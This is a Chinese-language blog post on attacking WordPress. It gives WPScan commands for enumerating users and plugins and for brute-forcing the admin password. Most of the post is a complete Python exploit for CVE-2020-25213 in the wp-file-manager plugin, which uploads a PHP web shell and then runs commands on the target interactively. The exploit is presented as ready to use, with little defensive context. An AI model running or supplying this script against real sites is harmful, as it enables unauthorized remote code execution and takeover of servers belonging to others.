首页 > 其他分享 >Wordpress漏洞

Wordpress漏洞

时间:2024-08-21 12:22:44浏览次数:15  
标签:headers url get 漏洞 Wordpress print -- requests

WPScan

WPScan是Kali Linux默认自带针对wordpress的一款扫描神器

1、刺探基础信息:
wpscan --url http://www.example.com

2、猜解后台用户名
wpscan --url http://www.example.com --enumerate u

3、使用字典暴破用户名admin的密码
wpscan --url http://www.example.com -P password.txt -U admin 

4、扫描插件
wpscan --url http://www.example.com --enumerate p

5、扫描易受攻击的插件
wpscan --url http://www.example.com --enumerate vp

6、扫描所有插件
wpscan --url http://www.example.com --enumerate ap

7.建议扫描的时候使用aggressive模式,不然有些插件扫描不出来
wpscan --url http://192.168.1.72 --enumerate ap --plugins-detection aggressive
CVE-2020-25213 WordPress远程代码执行漏洞

WordPress的文件管理器插件(wp-file-manager)6.9版本之前存在CVE-2020-25213 漏洞,该漏洞允许远程攻击者上传和执行任意PHP代码。

POC&EXP
mport json
import requests

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
                  "Chrome/91.0.4472.124 Safari/537.36 "
}

url_tail = "/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
upfiles_path = "/wordpress/wp-content/plugins/wp-file-manager/lib/files"
payload = "?cmd="

"""
    漏洞验证_1
    检测响应中是否有errUnknownCmd
"""


def Check_1(url):
    url_2 = url + url_tail
    res1 = requests.get(url=url_2, headers=headers)
    text1 = res1.text
    text2 = json.loads(text1)
    key = json.dumps(text2)  # 将json转换为字符串
    print(text2)
    key1 = "errUnknownCmd"
    if key1 in key:
        print("疑似漏洞存在")
        Next = input("是否进一步验证 Y or N :")
        if Next == "Y":
            Check_2(url)
    else:
        print("漏洞不存在")


"""
 漏洞验证_2
    访问上传的php文件是否有正确响应
    这里上传的php文件内容:<?php phpinfo() ?>
"""


def Check_2(url):
    data = {
        'cmd': 'upload',
        'target': 'l1_',
    }
    files = {
        'upload[0]': open('phpinfo.php', 'rb'),
    }
    url_3 = url + url_tail
    res = requests.post(url=url_3, headers=headers, data=data, files=files, verify=False)
    if res.status_code == requests.codes.ok:
        # print("上传成功!")
        d = res.json()
        p = d.get('added', [])[0].get('url')
        Finally_url = f'{url}{p}'
        res2 = requests.get(url=Finally_url, headers=headers)
        key2 = "PHP Version"
        if key2 in res2.text:
            print("CVE-2020-25213漏洞存在! ")
            flag = input("是否进行漏洞利用 Y or N :")
            if flag == "Y":
                while 1:
                    command = input("输入执行的命令: ")
                    if command == "exit":
                        break
                    exploit(url, command)
        else:
            print("漏洞不存在!")

"""
    漏洞利用
    上传php文件并调用命令执行
    exploit.php内容:<?php system($_GET['cmd']); ?>
"""

def exploit(url, command):
    data = {
        'cmd': 'upload',
        'target': 'l1_',
    }
    files = {
        'upload[0]': open('exploit.php', 'rb'),
    }
    url_2 = url + url_tail
    file_status = url + upfiles_path + "/exploit.php"
    res = requests.get(url=file_status, headers=headers, verify=False)
    if res.status_code == requests.codes.ok:
        Fin_url = file_status + payload + command
        res3 = requests.get(url=Fin_url, headers=headers)
        res3.encoding = 'gbk'
        print(res3.text)

    else:
        res2 = requests.post(url=url_2, headers=headers, data=data, files=files, verify=False)
        if res2.status_code == requests.codes.ok:
            # print("上传成功!")
            d = res2.json()
            p = d.get('added', [])[0].get('url')
            url_3 = f'{url}{p}'
            Fin_url = url_3 + payload + command
            res2 = requests.get(url=Fin_url, headers=headers)
            res2.encoding = 'gbk'
            print(res2.text)


def main():
    url = input("输入测试的URL:")
    Check_1(url)


if __name__ == '__main__':
    main()

标签:headers,url,get,漏洞,Wordpress,print,--,requests
From: https://blog.csdn.net/weixin_44737168/article/details/141256330

相关文章

  • 奥威亚云视频平台UploadFile.aspx存在文件上传漏洞
    1前言免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!2漏洞描述为了满足高校培养人才和教学管理的需求,顺应时......
  • BT5 2011.3.漏洞发现.3(nessus)
    第四部分SMB工具 1.SamrdumpTheSamrdumpisanapplicationthatretrievessensitiveinformationaboutthespecifiedtargetusingSecurityAccountManager(SAM),aremoteinterfacewhichisaccessibleundertheDistributedComputingEnvironment/RemoteProced......
  • BT5 2011.3.漏洞发现.2(http smb)
    第三部分HTTP工具 1.BurpSuite(1)BurpSuiteisacombinationofpowerfulwebapplicationsecuritytools.Thesetoolsdemonstratethereal-worldcapabilitiesofanattackerpenetratingthewebapplications.Itcanscan,analyze,andexploitthewebapplications......
  • BT5 2011.3.漏洞发现.1(cisco snmp)
    3.漏洞发现 内容简介第一部分:Cisco工具第二部分:SNMP工具第三部分:HTTP工具第四部分:SMB工具第五部分:综合漏洞发现工具Nessus 第一部分Cisco工具 拓扑介绍 1.CiscoAuditingToolCiscoAuditingTool(CAT)isaminisecurityauditingtool.ItscanstheCiscor......
  • 用友crm客户关系管理help.php存在任意文件读取漏洞
    产品介绍:用友U8CRM模块是一个综合性的客户关系管理系统,旨在帮助企业从客户出发,以客户关系为管理对象,通过动态管理客户信息、获得客户知识和评判客户价值状况,来全面提升并保持企业的竞争优势及盈利能力。 Fofa语句: body="用友U8CRM"  poc GET/pub/help.php?key=Y......
  • CVE-2021-21315漏洞复现
    一、基本信息攻击机:kaliIP:192.168.100.60靶机:CentOS7IP:192.168.100.40二、攻击过程下载node.js环境wgethttps://nodejs.org/dist/v12.18.4/node-v12.18.4-linux-x64.tar.xztar-xvfnode-v12.18.4-linux-x64.tar.xzmvnode-v12.18.4-linux-x64nodejsmvnodejs......
  • 某网关存在漏洞
    生存还是毁灭,这是一个值得考虑的问题,是默默忍受命运的暴虐的毒箭,还是挺身反抗人世的无涯的苦难,在奋斗中清扫那一切,这两种行为,哪一种更高贵。漏洞描述某网关存在漏洞漏洞实战访问漏洞url:输入普通管理员默认的账号密码:useradmin/nE7jA%5m漏洞证明:输入超级管理员默认......
  • dedecms 两个常见漏洞的复现
    侵权声明本文章中的所有内容(包括但不限于文字、图像和其他媒体)仅供教育和参考目的。如果在本文章中使用了任何受版权保护的材料,我们满怀敬意地承认该内容的版权归原作者所有。如果您是版权持有人,并且认为您的作品被侵犯,请通过以下方式与我们联系:[[email protected]]。我们将在确......
  • FastJson引入存在DDos攻击安全漏洞案例分析
    FastJson引入存在DDos攻击安全漏洞案例分析背景   某集团公司门户网站接口存在DDos攻击安全漏洞,其他服务端工程中依赖Fastjson进行序列化。Fastjson是阿里巴巴开发的一款高性能的JavaJSON处理库。本身在处理JSON数据时可能存在安全性问题,如JSON注入攻击。DDoS攻击是指攻击者......
  • 中间件漏洞原理与复现大全【万字总结】
    文章目录IISHTTP.SYS远程代码执行漏洞(CVE-2015-1635)漏洞描述影响版本漏洞复现IIS短文件之目录扫描1、概念3、应用场景:4、漏洞利用:IIS文件解析漏洞IIS6解析漏洞IIS7解析漏洞IIS写权限漏洞简介条件漏洞复现NginxNginx文件名逻辑漏洞原理条件复现Nginx解......